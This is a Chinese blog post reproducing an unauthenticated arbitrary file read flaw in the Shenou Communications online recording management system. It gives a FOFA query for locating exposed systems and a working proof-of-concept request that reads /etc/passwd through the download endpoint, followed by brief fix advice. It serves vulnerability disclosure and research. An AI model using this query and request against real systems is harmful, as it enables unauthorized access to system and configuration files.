申瓯通信在线录音管理系统任意文件读取漏洞复现

最新推荐文章于 2024-07-10 16:37:33 发布
最新推荐文章于 2024-07-10 16:37:33 发布
阅读量126 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/139987483
版权
漏洞复现 专栏收录该内容
36 篇文章 8 订阅 ¥9.90 ¥99.00
订阅专栏

简介

申瓯通信设备有限公司在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等,导致网站处于极度不安全状态。

漏洞复现

FOFA语法:

title="在线录音管理系统"

访问界面如下所示:

POC:

/main/download?path=/etc/passwd

拼接url GET请求访问:

http://ip/main/download?path=/etc/passwd

可直接下载到改系统的/etc/passwd文件

证明任意文件读取漏洞存在

修复建议

联系厂商升级至安全版本

添加接口访问控制

了解本专栏 订阅专栏 解锁全文
Cheng-Ling
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
申瓯通信 在线录音管理系统 download 任意文件读取漏洞复现
0xSec
06-17 487
申瓯通信在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
申瓯通信 在线录音管理系统 Thinkphp 远程代码执行漏洞复现
0xSec
06-21 585
申瓯通信 在线录音管理系统 存在Thinkphp 远程代码执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。
漏洞复现申瓯通信 在线录音管理系统 download 任意文件读取漏洞
siu~
06-18 266
申瓯通信在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞
siu~
06-22 468
申瓯通信在线录音管理系统存在Thinkphp远程代码执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。
0day 在线录音管理系统download任意文件下载漏洞和RCE命令执行漏洞
weixin_43167326的博客
06-12 781
在线录音管理系统是一种在线社区平台,旨在为用户提供一个共享知识、经验和想法的空间。社交圈子论坛系统除了提供基本的社交功能外,还可以根据用户行为和兴趣为用户推荐相关内容。
漏洞复现申瓯通信 在线录音管理系统 download 任意文件读取漏洞
qq_39894062的博客
06-26 457
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
漏洞复现申瓯通信 在线录音管理系统 Thinkphp 远程代码执行漏洞
qq_39894062的博客
06-23 821
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
申瓯HJK-120程控交换机管理系统
01-23
申瓯HJK-120程控交换机管理系统是一款专为申瓯HJK-120系列交换机设计的PC端管理软件,旨在提高通信设备的管理和调试效率,减少传统通过座机进行编程的繁琐步骤。该系统以其便捷的操作界面和强大的功能,为企业通信...
申瓯Soc3100电话交换机管理系统端控制软件.rar
09-05
早期WIN9X/XP系统上运行的管理系统,在WIN7上也能使用,支持综合监控与动态监控。功能包括以下设置项目:中继开关、计费方式、转接方式、发码方式、出局方式、中继方向、拆线方式、H信令、组号、板号是否转发、是否...
SOC1800电话录音系统用户手册
11-29
申瓯SOC1800电话录音系统用户手册,使用说明书
申瓯HJK-120(D)软件
04-29
申瓯HJK-120(D)软件是一款专为申瓯通信系统设计的应用程序,它主要用于管理和维护申瓯HJK-120(D)系列的通信设备。这款软件集成了丰富的功能,旨在提升通信系统的效率和稳定性,为用户提供便捷的操作体验。 首先,...
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 672
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
移动互联安全扩展要求测评项
hakksjss的博客
07-10 827
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 966
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
[图解]SysML和EA建模住宅安全系统-11-接口块
rolt的专栏
07-06 1006
当然内部块图里面肯定要比这个丰富
【知网CNKI-注册安全分析报告】
07-08 1570
知网作为全国学术界、教育界、出版界、图书情报界的共享平台,打造是国家基础设施,由于收费过高导致很多单位苦知网已经,名符其实的垄断行业,赚的盆满钵满的, 按理技术实力雄厚,但在验证产品方面,不是自己研发而是采用第三方的阿里的滑动条, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
最新发布
运维人生
07-10 384
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
申瓯电话程控的串口转发功能
07-25
申瓯电话程控系统的串口转发功能是指该系统可以通过串口将电话信号转发给其他设备或系统进行处理。具体的实现方式可能会有所差异,下面是一种常见的串口转发功能的工作流程: 1. 配置串口参数:通过申瓯电话程控系统的管理界面或配置文件,设置串口的波特率、数据位、停止位、奇偶校验等参数,以确保与其他设备兼容。 2. 监听电话呼叫:申瓯电话程控系统会监听电话呼叫事件,包括来电、去电等。 3. 接收呼叫信号:当电话呼叫事件发生时,申瓯电话程控系统会通过串口接收呼叫信号,并将其转换为可处理的数据格式。 4. 串口转发:申瓯电话程控系统将接收到的电话信号通过串口发送给其他设备或系统。这些设备或系统可以是计算机、服务器、外围设备等。 5. 处理反馈信号:如果其他设备或系统有返回的反馈信号,申瓯电话程控系统会通过串口接收并进行处理,例如记录日志、触发其他操作等。 需要注意的是,具体的串口转发功能实现可能会受到申瓯电话程控系统的特性和版本的限制,因此在实际应用中,需要根据具体的系统文档和指导进行配置和操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值